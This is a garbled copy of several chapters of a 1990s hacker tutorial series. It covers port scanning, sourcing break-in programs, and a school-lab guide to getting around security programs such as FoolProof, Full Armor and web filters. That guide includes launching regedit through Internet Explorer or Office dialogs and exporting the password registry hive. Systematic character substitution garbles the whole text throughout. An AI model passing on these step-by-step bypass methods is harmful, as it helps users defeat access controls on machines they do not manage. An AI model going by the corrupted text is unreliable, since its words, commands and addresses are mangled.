when it gets data under S6#+ is sendmail& See the G#6HH on forging email for e'am.les of fun ways to .lay )legally) with .ort -5 on other .eo.lebs com.uters& Hor a com.lete list of commonly used #/+I1+ .orts( see 5H/ ,KMM& 4ne .lace you can look this u. is htt.:IIds-&internic&netIrfcIrfc,KMM&t't )))))))))))))))))))))))))))))))))))))))))))))))))))) -& 0nderstand the o.erating system of the com.uter you .lan to crack& Sure( lots of .eo.le who are ignorant on o.erating systems break into com.uters by using canned .rograms against .itifully <ulnerable bo'es& *s one teen hacker told me after returning from 2ef /on C( `6any of the guys there didnbt e<en know the dcatb command a *nyone can break into some com.uter somewhere if they ha<e no .ride or ethics& We assume you are better than that& 1f the breakin is so easy you can do it without ha<ing a clue what the command `cata is( you arenbt a hacker& ;oubre =ust a com.uter <andal& %& Study the ways other .eo.le ha<e broken into a com.uter with that o.erating system and software& #he best archi<es of breakin techni@ues for 0ni' are Bugtra@ htt.:IIwww&nets.ace&orgIls<?archi<eIbugtra@&html& Hor Windows "#( check out htt.:IIntbugtra@&rc&on&caIinde'&html& * chea. and easy .artial shortcut to this arduous learning .rocess is to run a .rogram that scans the .orts of your target com.uter( finds out what daemons are running on each .ort( and then tells you whether there are breakin techni@ues known to e'ist for those daemons& Satan is a good one( and absolutely free& ;ou can download it from ft.:IIft.&fc&netI.ubIdefconIS*#*"I or a ba>illion other hacker ft. sites& *nother great .ort scanner is 1nternet Security Scanner& 1t is offered by 1nternet Security Systems of "orcross( Georgia 0S*( ,?DMM?KKE?-%E-& #his tool costs lots of money( but is the security scanner of choice of the .eo.le who want to kee. hackers out& ;ou can reach 1SS at htt.:IIwww&iss&netI& 1nternet Security Systems also offers some freebie .rograms& #he :7ocalhost: 1nternet Scanner S*H3suite is set to only run a security scan on the 0ni' com.uter on which it is installed !hack your on bo' $ ;ou can get it from htt.:IIwww&blanket&comIiss&html& ;ou can get a free beta co.y of their scanner for Win "# at htt.:IIwww&iss&netIaboutIwhatsnew&html95SF"#&

1n theory 1SS .rograms are set so you can only use them at most to .robe com.uter networks that you own& Howe<er( a few months ago 1 got a credible re.ort that a giant com.any that uses 1SS to test its bo'es on the 1nternet backbone accidentally shut down an 1S+ in 3l +aso with an 1SS automated syn flood attack& 1f you want to get a .ort scanner from a @uiet little .lace( try out htt.:II-MG&,DD&5-&99& #his offers the *smodeus "etwork Security Scanner for Windows "# G&M& 1n most .laces it is legal to scan the .orts of other .eo.lebs com.uters& "e<ertheless( if you run Satan or any other .ort scanning tool against com.uters that you donbt ha<e .ermission to break into( you may get kicked off of your 1S+& Hor e'am.le( recently an 1rish hacker was running `security auditsa of the 3merald 1slandbs 1S+s& He was .robably doing this in all sincerity& He emailed each of his targets a list of the <ulnerabilities he found& But when this freelance security auditor .robed the 1S+ owned by one of my friends( he got that hacker kicked off his 1S+& `But why gi<e him a hard time for =ust doing security scans? He may ha<e woken u. an administrator or two(a 1 asked my friend& `Hor the same reason they scramble an H?,E for a bogie(a he re.lied& #he way 1 get around the .roblem of getting .eo.le mad from .ort scanning is to do it by hand using a telnet .rogram& 6any of the G#6HHs show e'am.les of .ort scanning by hand& #his has the ad<antage that most systems administrators assume you are merely curious& Howe<er( some ha<e a daemon set u. so that e<ery time you scan e<en one .ort of their bo'es( it automatically sends an email to the systems administrator of the 1S+ you use com.laining that you tried to break in ?? and another email to you telling you to turn yourself in #he solution to this is to use 1+ s.oofing& But since 1bm sure you are only going to try to break into com.uters where you ha<e .ermission to do so( you donbt need to know how to s.oof your 1+ address&

)))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou may laugh yourself silly warning: 1f you .ort scan by hand against obscure&sekurity&org( you may run into some hilarious daemons installed on weird high .ort numbers& )))))))))))))))))))))))))))))))))))))))))))))))))))))) G& "ow that you know what <ulnerable .rograms are running on your target com.uter( ne't you need to decide what .rogram you use to break in& But arenbt hackers brilliant geniuses that disco<er new ways to break into com.uters? ;es( some are& But the a<erage hacker relies on .rograms other hackers ha<e written to do their deeds& #hatbs why( in the book #akedown( some hacker !maybe 8e<in 6itnick( maybe not$ broke into #sutomu Shimomurabs com.uter to steal a .rogram to turn a "okia cell .hone into a scanner that could ea<esdro. on other .eo.lebs cell .hone calls& #his is where those >illions of hacker web .ages come into .lay& 2o a web search for `hackera and `ha'ora and `hGck%ra etc& ;ou can s.end months downloading all those .rograms with .romising names like `1+ s.oofer&a 0nfortunately( you may be in for an ugly sur.rise or two& #his may come as a total shock to you( but some of the .eo.le who write .rograms that are used to break into com.uters are not e'actly 3agle Scouts& Hor e'am.le( the other day a fellow who shall remain nameless wrote to me `1 disco<ered a .erson has been looting my www dir( where 1 u.load stuff for friends so 1 am gonna lea<e a nice little sur.rise for him in a <ery cool looking .rogram A$ !if you know what 1 mean$a But letbs say you download a .rogram that .romises to e'.loit that security hole you =ust found with a Satan scan& 7etbs say you arenbt going to destroy all your files from some nice little sur.rise& ;our ne't task may be to get this e'.loit .rogram to com.ile and run& 6ost com.uter breakin .rograms run on 0ni'& *nd there are many different fla<ors of 0ni'& Hor each fla<or of 0ni' you can mi' or match se<eral different shells& !1f none of this makes sense to you( see the G#6HHs on how to get a good shell account&$ #he .roblem is that a .rogram written to run in( for e'am.le( the csh shell on Solaris 0ni' may not run from the bash shell on Slackware 7inu' or the tcsh shell on 1ri'( etc&

1t is also .ossible that the guy who wrote that breakin .rogram may ha<e a conscience& He or she may ha<e figured that most .eo.le would want to use it maliciously& So they made a few little teeny weeny changes to the .rogram( for e'am.le commenting out some lines& So 6r&I6s& #ender /onscience can feel that only .eo.le who know how to .rogram will be able to use that e'.loit software& *nd as we all know( com.uter .rogrammers would ne<er( e<er do something mean and horrible to someone elsebs com.uter& So this brings us to the ne't thing you should know in order to break into com.uters& 5& 7earn how to .rogram 3<en if you use other .eo.lesb e'.loit .rograms( you may need to tweak a thing or two to get them to run& #he two most common languages for e'.loit .rograms are .robably / !or /XX$ and +erl& )))))))))))))))))))))))))))))))))))))))))))) "ewbie note: 1f you canbt get that .rogram you =ust downloaded to run( it may be that it is designed to run on the 0ni' o.erating system( but you are running Windows& * good ti. off that this may be your .roblem is a file name that ends with `&g>a& )))))))))))))))))))))))))))))))))))))))))))) So( does all this mean that breaking into com.uters is really( really hard? 2oes all this mean that if you break into someonebs com.uter you ha<e .ro<en your digital manhood !or womanhood$? "o& Some com.uters are ridiculously easy to break into& But if you break into a .oorly defended com.uter run by dunces( all you ha<e .ro<en is that you lack good taste and like to get into really stu.id kinds of trouble& Howe<er( if you manage to break into a com.uter that is well managed( and that you ha<e .ermission to test( you are on your way to a high .aying career in com.uter security& 5emember this 1f you get busted for breaking into a com.uter( you are in trouble big time& 3<en if you say you did no harm& 3<en if you say you made the com.uter better while you were .rowling around in it& *nd your chances of becoming a com.uter security .rofessional dro. almost to >ero& *nd ?? do you ha<e any idea of how e'.ensi<e lawyers are? 1 ha<enbt e<en hinted in this tutorial at how to kee. from getting caught& 1t is at least as hard to co<er your tracks as it is to break into a com.uter& So if you

had to read this to learn how to break into com.uters( you are going to wind u. in a world of hurt if you use this to tres.ass in other .eo.lebs com.uters& So( which way do you .lan to go? #o be known as a good guy( making tons of money( and ha<ing all the hacker fun you can imagine? 4r are you going to slink around in the dark( com.ulsi<ely breaking into strangersbb com.uters( .oor( afraid( angry? Busted? Staring at astronomical legal bills? 1f you like the rich and ha..y alternati<e( check out back issues of the Ha..y Hacker 2igests to see what com.uters are o.en to the .ublic to try to crack into& Webll also make new announcements as we disco<er them& *nd donbt forget to try to crack obscure&sekurity&org& "o one has managed to break it when attacking from the outside& 1 donbt ha<e a clue of how to get inside it( either& ;ou may ha<e to disco<er a new e'.loit to breach its defenses& But if you do( you will ha<e e'.erienced a thrill that is far greater than breaking into some 7ower Slobo<ian businessmanbs %DE bo' running 7inu' -&M with sendmail G&whate<er& Show some chi<alry and .lease donbt beat u. on the hel.less( 48? *nd stay out of =ail or we will all make fun of you when you get caught& 4f course this Guide barely scra.es the surface of breaking into com.uters& We ha<enbt e<en touched on to.ics such as how to look for back doors that other crackers may ha<e hidden on your target com.uter( or keystroke grabbers( or attacks through malicious code you may encounter while browsing the Web& !#urn off Ra<a on your browser "e<er( e<er use 1nternet 3'.lorer&$ But maybe some of you ubergenius ty.es reading this could hel. us out& Ho.e to hear from you FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Warning 0se this information at your own risk& Get busted for trying this out on some 7ower Slobo<ian businessmanbs com.uter and we will all make fun of you( 1 .romise #hat goes double for 0..er Slobo<ian bo'es FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& % "o& E

How to Be a Hero in /om.uter 7ab FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1f you are a student( you know you can get into trouble if you hack your schoolbs com.uters& But if you can .ersuade your teachers that you are the good guy who will hel. .rotect them from digital <andals( you can become a hero& ;ou may e<en get their .ermission to try break?in techni@ues& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1n this Guide you will learn how to: L /ustomi>e the animated logo on 1nternet 3'.lorer L /ircum<ent security .rograms through 1nternet 3'.lorer L /ircum<ent security .rograms through any 6icrosoft 4ffice .rograms L /ircum<ent Hool+roof L /ircum<ent Hull *rmor L Sol<e the web babysitter .roblem L Break into absolutely any school com.uter& L 8ee. clueless kiddie hackers from messing u. your school com.uter system )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) #his Guide will gi<e you some ti.s for safely .ro<ing =ust how good you are( and maybe e<en showing your hacker teacher buddies a thing or two& But 1 would feel really bad if someone were to use the ti.s in this Guide to mess u. his or her life& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can mess u. your life warning: 1n most countries kids donbt ha<e nearly the legal .rotections that adults ha<e& 1f you get in<ol<ed in a hacker gang at school and you guys get caught( you can easily get e'.elled from school or e<en arrested& 3<en if the authorities donbt ha<e <ery good .roof of your guilt& 3<en if you are innocent& *rghhh )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Hirst task of this Guide( then( is how to find teachers who would lo<e to .lay hacker games with you and gi<e you free run of the schools com.uter systems& Whoa( you say( now this is some social engineering challenge But actually this isnbt that hard& /oyote suggests( `in many cases you may find that if you .ro<e yourself res.onsible !i&e&: not acting like a =erk in class and not hacking to be cool$( it

will be easier to gain the trust of the teacher and subse@uently gain the =ob hel.ing with the systems& *nd once you reach this le<el you are almost guaranteed that you will know more about system management( and of course hacking( than you could ha<e by sim.ly breaking in&a Herebs the first thing you need to remember& ;our teachers are o<erworked& 1f they get mad at hackers( it is because com.uter <andals kee. on messing things u.& Guess who gets to stay late at work fi'ing the mess students make when they break into school com.uters? 5ight( itbs usually your com.uter lab teachers& #hink about it& ;our com.uter lab teachers might really( really( like the idea of ha<ing you hel. with the work& #he .roblem is ?? will they dare to trust you? 8arl Schaffarc>yk warns( `1 nearly got chucked out of school !many years ago$ for .ulling u. a 24S .rom.t on a system that was .rotected against such things&a Sheesh( =ust for getting a 24S .rom.t? But the .roblem is that your teachers go to a lot of effort to set school com.uters u. so they can be used to teach classes& #he minute they reali>e you know how to get to 24S( they know you could mess things u. so bad they will ha<e to s.end a slee.less night ?? or two or three ?? .utting that com.uter back together& #eachers hate to stay u. all night& 1magine that So if you really want to work a deal where you become su.reme ruler and hero?in?chief of your schoolbs com.uters( donbt start by getting caught 2onbt start e<en by showing your teacher( `Hey( look how easy it is to get a 24S .rom.t a 5emember( some authorities will immediately kick you out of school or call the co.s& Honest( many .eo.le are terrified of teenage hackers& ;ou canbt really blame them( either( when you consider those news stories& Here are some e'am.les of stories your school authorities ha<e .robably read& ? ,% H3B50*5; ,99K Hackers are re.orted to be using ser<ers at Southam.ton 0ni<ersity to circulate threatening emails !that$ &&& instruct reci.ients to cancel credit cards( claiming their security has been breached& !c$ C"0 Business +ublications 7imited( ,99K

"3#W458 "3WS KI5I9K +%9 * teenager was fined an e@ui<alent of 0SO%5M for .aralysing 0S tele.hone switchboards&&&#he unnamed teenager made around EM(MMM calls&&& !/$ ,99K 6- /ommunications 7td& #373/46W4572W153 EI5I9K W4572/46 in the 08 recently suffered a systems failure following a hacker attack&&& !/$ ,99K 6- /ommunications 7td& #373/46W4572W153 EI5I9K Scary( huh? 1tbs not sur.rising that nowadays some .eo.le are so afraid of hackers that they blame almost anything on us& Hor e'am.le( in ,99K( authorities at a na<al base at first blamed attackers using high?energy radio wa<es for com.uter screens that fro>e& 7ater in<estigators learned that shi. radars( not hackers( were free>ing screens& So instead of getting mad at teachers who are terrified of hackers( gi<e them a break& #he media is inundating them with scare stories& +lus which they ha<e .robably s.ent a lot of time fi'ing messes made by kiddie hackers& ;our =ob is to show them that you are the good guy& ;our =ob is to show them you can make life better for them by gi<ing you free run of the school com.uters& #his same basic techni@ue also will work with your 1S+& 1f you offer to hel. for free( and if you con<ince them you are res.onsible( you can get the right to ha<e root !or administrati<e$ access to almost any com.uter system& Hor e'am.le( 1 was talking with the owner of the 1S+ one day( who com.lained how o<erworked he was& 1 told him 1 knew a high school so.homore who had been busted for hacking but had reformed& #his fellow( 1 .romised( would work for free in e'change for the root .assword on one of his bo'es& "e't day they did the deal& "ow this hacker and his friends get to .lay break?in games on this com.uter during off hours when .aying customers donbt use it& 1n e'change( those kids fi' anything that goes wrong with that bo'& So try it& Hind an o<erworked teacher& 4r o<erworked owner of an 1S+& 4ffer to show him or her that you know enough to hel. take care of those com.uters& But how do you .ro<e you know enough for the =ob?

1f you start out by telling your com.uter lab teacher that you know how to break into the school com.uters( some teachers will get e'cited and sus.end you from school& Rust in case your teacher is the kind who gets scared by all those hacker news stories( donbt start out by talking about breaking in 1nstead( start with showing them( with their .ermission( a few chea. tricks& /hea. 1nternet 3'.lorer #ricks * good .lace to start is with 1nternet 3'.lorer& Hor starters( what could be more harmless ?? yet effecti<e at showing off your talents ?? than changing the animated logos on 13 !13$ and "etsca.e? ;ou could do it the easy way with 6icroangelo( a<ailable from ft.:IIft.&im.actsoft&comI.ubIim.actsoftIma-,&>i.& But since you are a hacker( you may want to im.ress your teachers by doing it the hacker way& ,$ Bring u. +aint& -$ /lick `image(a then `attributes&a %$ /hoose width W GM( heightWGDM( units in .els& G$ 6ake a series of .ictures( each GM'GM .els& 4ne way to do this is to o.en a new .icture for each one and set attributes to width W GM and height W GM& #hen cut and .aste each one into the GM'GDM image& 5$ 6ake the to. GM'GM image be the one you want to ha<e sit there when 13 is doing nothing& #he ne't three are shown once when a download starts( and the rest are .layed in a loo. until the download is done& ;ou must ha<e an e<en number of images for this to work& E$"ow run the 5egistry editor& #his is well hidden since 6icrosoft would .refer that you not .lay with the 5egistry& 4ne way is to click `start(a then `.rogramsa then `6S?24S(a and then in the 6S?24S window with the /:Twindows .rom.t gi<e the command `regedit&a K$ /lick to highlight the subkey :H83;F/0553"#F0S35TSoftwareT6icrosoftT13T#oolbar: D$ 4n the task bar abo<e( click `3dit(a then `Hind&a #y.e `Brandbitma.a in the find window& 9$ "ow double click on BrandBitma. to get a dialog window& #y.e the .ath and file name of your custom animated gra.hic into it& So letbs say you set u. a flaming skull that rotates when you run 13& ;our teacher is im.ressed& "ow she wants you to .ut it back the way it was before& #his is easy& Rust o.en u. BrandBitma.( and delete the name of your

animation file& Windows 3'.lorer will then automatically re<ert to the sa<ed gra.hic in BackBitma.& 7etbs now show your teacher something that is a little bit scary& 2id you know that 1nternet 3'.lorer !13$ can be used to break some Windows babysitter .rograms? ;our school might be running one of them& 1f you .lay this right( you can win .oints by trashing that babysitter .rogram& ;es( you could =ust get to work on those babysitter .rograms using the ti.s of the G#6HH on how to break into Win95& Howe<er( we will also look at a new way to get around them in this cha.ter( using 13& #he ad<antage of using 13 when your teacher is an'iously looking o<er your shoulder is that you could =ust `accidentallya stumble on some cool stuff( instead of looking like a dangerous hacker& #hen you could show that you know how to take ad<antage of that security flaw& Besides( if it turns out the security .rogram you try to o<erride is well enough written to kee. 13 from breaking it( you donbt look like a dummy& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il Genius ti.: +eo.le are less afraid of you if you ty.e sloowwwlllllyyyyyyyyyy& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) #he dirty little secret is that 13 actually is a Windows shell .rogram& #hat means it is an alternati<e to the Win95 deskto.& Hrom 13 you may launch any .rogram& 13 o.erates much like the +rogram 6anager and Windows 3'.lorer that come with the Win 95 and Win "# o.erating systems& ;es( from the 13 shell you can run any .rogram on your com.uter ?? unless the security .rogram you are trying to break has antici.ated this attack& With a little ingenuity you may be able to e<en gain control of your schoolbs 7*"& But donbt try that =ust yet )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: * shell is a .rogram that mediates between you and the o.erating system& #he big deal about 13 being a Windows shell is that 6icrosoft ne<er told anyone that it was in fact a shell& #he security .roblems that are .laguing 13 are mostly a conse@uence of it turning out to be a shell& By contrast( the "etsca.e and 6osaic Web browsers are not @uite such full? featured shells& #his makes them safer to use& But you can still do some

interesting things with them to break into a Win95 bo'& 3'.eriment and ha<e fun )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) #o use 13 as a Win95 shell( bring it u. =ust like you would if you were going to surf the Web& 1f your com.uter is set to automatically initiate an 1nternet connection( you can kill it& ;ou donbt need to be online for this to work& "ow here are a few fun suggestions& 1n the s.ace where you would normally ty.e in the 057 you want to surf( instead ty.e in c:& Whoa( look at all those file folders that come u. on the screen& "ow for fun( click `+rogram Hilesa then click `*ccessoriesa then click `+aint&a *ll of a sudden +aint is running& "ow .aint your teacher who is watching this hack sur.rised& "e't close all that stuff and get back to the 057 window in 13& /lick on the Windows folder( then click on 5egedit&e'e to start it u.& 3'.ort the .assword file !itbs in H83;F/7*SS3SF544#$& 4.en it in Word +ad& 5emember( the ability to control the 5egistry of a ser<er is the key to controlling the network it ser<es& Show this to your teacher and tell her that youbre going to use 13 to change all the schoolbs .assword files& 1n a few hours the Secret Ser<ice will be fighting with the HB1 on your front lawn o<er who gets to try to bust you& 48( only kidding here& "o( maybe it would be a bit better to tell your teacher that if you can edit the registry( you can get total control o<er that com.uter& *nd maybe much more& Suggest that the school delete 13 from all its com.uters& ;ou are on the road to being a hero& 1f you actually do edit the 5egistry( you had better know how to re<ert to its backu.( or else undo your changes& 4therwise you will be making more work for the com.uter lab teacher instead of less work& 5emember( the ob=ecti<e is to .ro<e to your teachers you can cut how much work they ha<e to do What if the school babysitter .rogram wonbt let you run regedit&e'e? #ry ty.ing c:Icommand&com& #hen see /ha.ter - for how to edit the 5egistry from 24S& 1f you ha<e gotten this far with 13( ne't try entering r:I or w:I or >: etc& to see if you can access the disk of a network ser<er& Be sure to do this with your

teacher watching and with her .ermission to try to access network com.uters& 1f you succeed( now you ha<e a really good reason to ask her to take 13 off all the school com.uters& #his is because you ha<e =ust taken o<er the entire school 7*"& But you are a hero because you ha<e done it to sa<e your school from those mean kiddie hackers who change grades and class assignments& By now you ha<e a great shot at getting a <olunteer =ob running the schoolbs com.uter systems& Before you know it( you and your friends will be o.enly .laying Suake at school ?? and the authorities will consider it a small .rice to .ay for your e'.ertise& /hea. #ricks with 6icrosoft 4ffice ;ou also can run a Windows shell from se<eral 6icrosoft 4ffice .rograms& 5emember( once you get a shell( you ha<e a good shot at disabling security .rograms& #he following e'.loit works with 6icrosoft Word( 3'cel( and +ower.oint& #o use them get into a Windows shell: ,$ /lick `hel.a( then `*bout 6icrosoft !name of .rogram inserted here$(a then `System 1nfo&&&a -$ #his brings u. a window which includes a button labeled `run&a /lick `runa and .ut in anything you want( for e'am.le regedit&e'e !#hat is( unless the security .rogram you are trying to break has a way to disable this&$ 6icrosoft *ccess is a bit harder& #he `runa button only gi<es a few choices& 4ne of them is Hile 6anager& But Hile 6anager is also a Windows shell& Hrom it you can run any .rogram& !#hat is( unless the security .rogram you are trying to break has a way to disable this&$ How to /ircum<ent Hool+roof #here is usually a hotkey to turn off Hool+roof& 4ne young hacker re.orts his school uses shift?alt?U !hold down the shift and alt keys at the same time( then .ress the `'a key&$ 4f course other schools may ha<e other arrangements& 1f you get the hotkey right( a sound may .lay( and a lock in the lower?right corner should o.en for -M?%M seconds&

2ante tells how he managed to get out of a hot s.ot with an e<en better hack of Hool +roof& `6y com.uter science teacher asked me to show her e'actly H4W 1 managed to .rint the dthe uni<erse re<ol<es around meb image 1 made to all the network .rinters in the school&&&a So he had her watch while he did the deed& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can get .unched in the nose warning: 2ante was lucky that his teacher was understanding& 1n some schools a harmless =oke like this would be grounds for e'.ulsion& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Here is how 2ante ?? and anyone ?? may disable Hool+roof& ,$ Hirst( break into the Windows bo' using one of the techni@ues of the G#6HHs on Hacking Windows& Warning ?? donbt try the soldering iron bit& ;our teacher will faint& %$ "ow you can edit the autoe'ec&bat and config&sys files& !Be sure to back them u.&$ 1n config&sys delete the line de<iceWf.( and in autoe'ec&bat( delete f.tsr&e'e& G$ 5un regedit&e'e& ;ou ha<e to remo<e Hool+roof from the 5egistry( too& 0se the 5egedit search feature to find references to Hool +roof& 5$ Hind the 5egistry backu. files and make co.ies with different names =ust in case& 6aking a mistake with the 5egistry can cause s.ectacular messes E$ Sa<e the registry( and reboot& Hool+roof wonbt load& K$ #o .ut things back the way they were( rename the backu. files& ;ou are now the school hero security e'.ert& How to /ircum<ent Hull *rmor `1 ran u. against this .rogram D months ago at school( they attem.ted to .re<ent .eo.le from writing to the hard dri<e& 1t .resented itself as a challenge&&&&for about 5 minutes&a ?? 2a<e 6anges& Herebs how 2a<e tells us he did the deed: ,$ 1n the .ro.erties of the .rogram it mentions the thread file !can't remember the name of the file$ it was something&<b' -$ 48&&&this is easy enough( o.en note.ad( o.en something&<b' %$ Rust because 1 can't write to the hard dri<e doesn't mean 1 can't edit something already there( delete the first character from the file& G$ #he file !o.ened in note.ad$ looks like garbage( but if memory ser<es the first letter was 6&

5$ Sa<e the Hile and restart the com.uter( it should come u. with an error like :0nable to 1nitiali>e Hull *rmor:& E$ "ow you can go into addIremo<e .rograms and uninstall it& *gain( remember to back u. all files before changing them so you can .ut the com.uter back the way you found it& Sol<e the Web Babysitter +roblem Su..ose your ne't goal is to get rid of Web babysitter .rograms& But this can be a tough =ob& #hink about it from the .oint of <iew of the teachers& 1f e<en one kid were to com.lain to her .arents that she had seen dirty mo<ies running on other kidbs monitors in com.uter lab( your school would be in big trouble& So merely blasting your way through those babysitter .rograms with techni@ues such as those you learned in /ha.ter - will sol<e the .roblem for only a short time ?? and get you and your teacher and your school in trouble& But once again you can be a hero& ;ou can hel. your teachers disco<er the Web sites that are being blocked by those babysitter .rograms& #hey may be sur.rised to find out the block lots more than naughty .ictures& #hey often secretly censor certain .olitical sites( too& 1f your school is running /;B35sitter( you can really beat u. on it& /;B35sitter has encry.ted its list of banned sites( which include those with .olitical beliefs they donbt like& But you can download a .rogram to decry.t this list at: htt.:II.eacefire&orgIinfoIhack#H1S&shtml& !#his Web site is maintained by a teen organi>ation( +eacefire( de<oted to freedom of s.eech&$ When your teacher disco<ers the hidden .olitical agenda of /;B35sitter( you are a hero& 0nless( of course( your teacher agrees with /;B35sitterbs tactics& 1f so( you can .robably find other teachers in your school who will be a..alled by /;B35sitter& How about 13bs built?in site blocking system? 1t is harder to unco<er what it blocks because it works by limiting the <iewer to web sites that ha<e `certificatesa .ro<ided by a number of organi>ations& 1f a site hasnbt gone to the effort of getting a certificate( 13 can kee. you from seeing it& 4f course( after reading /ha.ter -( you can @uickly disable the 13 censorshi. feature& But instead of doing this( how about directing your teacher to htt.:II.eacefire&org and let him or her follow the links? #hen .erha.s the

authorities at your school will be ready to negotiate with you to find a way to gi<e you freedom to surf without grossing out other kids in the com.uter lab or library who canbt hel. but notice what may be on your monitor& How to Break into *bsolutely any School /om.uter *s you know from /ha.ter -( you can break into any com.uter to which you ha<e .hysical access& #he trick is to figure out( once you ha<e com.lete control( how to disable whate<er .rogram is gi<ing you a hard time& #here are only a few .ossible ways for these .rograms to work& 6aybe all you need to do is control?alt?delete and remo<e it from the list of acti<e .rograms that brings u.& 1f this doesnbt work( if you can get into 24S( you can edit any files& See /ha.ter , for details how all the ways to get to 24S& 4r you may only need to access regedit&e'e& ;ou can run it from either 24S or( de.ending on how good your .roblem .rogram is( from Windows& 4nce you can edit files( the ones you are likely to need to alter are autoe'ec&bat( config&sys( anything with the e'tension &.wl or &lnk( TwindowsTstartm],T.rogramsTstartu.( and the 5egistry& 7ook for lines with sus.icious names that remind you of the name of the .rogram you want to disable& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can get .unched in the nose note: 4f course you could do something ob<ious like `format c:a and reinstall only what you want on that bo'& But this will make your teachers throw fits& 6ega fits& 1f you want to be a hero( make sure that you can always return any school com.uter to the way it was before you hacked it& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) When you are done( turn the <ictim com.uter off and then back on again instead of a reboot with .ower still on& #his will get rid of anything lingering in 5*6 that could defeat your efforts& 8ee. /lueless 8iddie Hackers from 6essing u. ;our School /om.uters

"ow that you ha<e shown your teachers that you can break absolutely any security on any bo' to which you ha<e .hysical access( what ne't? 2o you =ust lea<e your teachers feeling awed and hel.less? 4r do you hel. them? #here is a reason why they ha<e security systems on your schoolbs com.uters& ;ou would be ama>ed at all the things clumsy or malicious users can do& ;ou can do your school a world of good by using your hacking skills to fi' things so that security works much better& Here are some basic .recautions that you can offer to your teachers to lock down school com.uters& !See the G#6HH on how to break into Windows com.uters for instructions on how to do most of these&$ ,$ 2isable all boot keys& -$ +assword the /64S& 1f it already has a .assword( change it& Gi<e your teacher the new .assword& %$ 5emo<e any .rograms that allow the user to get to regedit or dos& G$ +rograms that allow hot keys to circum<ent security should be changed( if .ossible( to disable them& 5$ 5emo<e .rograms that canbt be made safe& E$ 2onbt make it .ossible for Win95 com.uters to access sensiti<e data on a network disk& !#he .asswords can be easily grabbed and decoded&$ K$ #ry really( really hard to .ersuade the school administration to re.lace Win95 with Win"#& With e'.erimentation you will figure out much more for yourself& Since Win95 is a totally insecure o.erating system( this will be a losing battle& But at least you will be able to kee. secure enough that those students who do break in will know enough to not do anything disastrous by accident& *s for malicious school hackers( sigh( there will always be kewl dMMd> who think `format c:a shows they are( ahem( kewl dMMd>& ;ou may also ha<e a .roblem with school administrators who may feel that it is incon<enient to set u. such a secure system& #hey will ha<e to gi<e u. the use of lots of con<enient .rograms& 0.grading to Win"# will cost money& #ry e'.laining to them how much easier it will be to kee. those wannbe hacker <andals from trashing the school com.uters or using them to <isit biancabs Smut Shack&

*re you ready to turn your hacking skills into a great re.utation at school? *re you ready to ha<e the com.uter lab teachers begging to learn from you? *re you ready to ha<e the entire school com.uter system under your control ?? legally? ;ou will( of course( only use the tricks of this Guide under the su.er<ision of an admiring teacher( right? 1t sure is more fun than e'.ulsion and =u<enile court

/ontents of Colume G: Hacker Wars: Highting the /yberna>is FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Guide to !mostly$ Harmless Hacking Col& G: 1nformation Warfare Series "o& ,: Hacker Wars: Highting the /yberna>is FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF #here is a war underway in cybers.ace& 1t is a war between the forces of re.ression and those of us who treasure freedom& 4n the side of re.ression are go<ernments who fear the untrammeled freedom of s.eech that is today's 1nternet ?? and se<eral bands of com.uter criminals who ha<e the ner<e to call themsel<es hackers& 1 .refer to call them cyberna>is& #hey are the s.iritual descendants of the "a>is of the Germany of the ,9%Ms( who burned books in their cam.aign to kee. the German .eo.le ignorant& #he tactics of todaybs cyberna>is are to shut down .eo.lebs email accounts( deface Web .ages( and to use terror tactics to get .eo.le kicked of their 1nternet ser<ice .ro<iders& 1n some cases cyberna>is also target their <ictims with massi<e credit card fraud( death threats( and worse& So far( the cyberna>is ha<e been far more successful than go<ernments in shutting down Web sites with which they disagree( blocking email( and getting .eo.le whose ideas they dislike kicked off 1nternet ser<ice .ro<iders& 1tbs a war that has targeted this Ha..y Hacker email list e<er since we started it in *ugust ,99E& #he cyberna>is ha<e felt we merit a wide range of attacks(

not only digital but including blackmail and threats against those who ha<e been courageous enough to be .art of Ha..y Hacker& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1n this Guide( the first of the 1nformation Warfare Colume( you will learn: L what are hacker wars L Web .age hacking L denial of ser<ice L sniffing L social engineering L 1S+ hostage taking L the damage hacker warriors may do to bystanders L why you may get hit someday L how to get into a hacker war !some .eo.le want to $ L how to kee. from getting caught ?? "4# L defense techni@ues that donbt break the law )))))))))))))))))))))))))))))))))))))))))))))))))))))))))) #he most serious battle in these wars took .lace 4ct& G?-,( ,99K& 1t targeted Bronc Buster& 2uring the course of this battle( =ericho and 6odify sent me many email messages that made it clear that Bronc was being hit because of his high @uality Web site !ho.e you can find it still u. at htt.:IIshowdown&org$ and his association with Ha..y Hacker& #his war escalated beyond an initial s.ate of forgeries beginning 4ct& G( ,99K that attem.ted to make it look like Bronc was a self?confessed .edo.hile( into scorched?core warfare that shut down the Succeed&net 1S+ re.eatedly& #hey attacked Succeed&net because it was .ro<iding Bronc with a shell account& 1 hel.ed muster both the HB1 and <olunteer technical hel. from an 1nternet backbone .ro<ider to aid Succeed&net in its struggle against these <indicti<e com.uter criminals& 1f you( too( get hit by the cyberna>is( too( tell me about it& 1 will be delighted to hel. you fight them& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 don't want to get sued 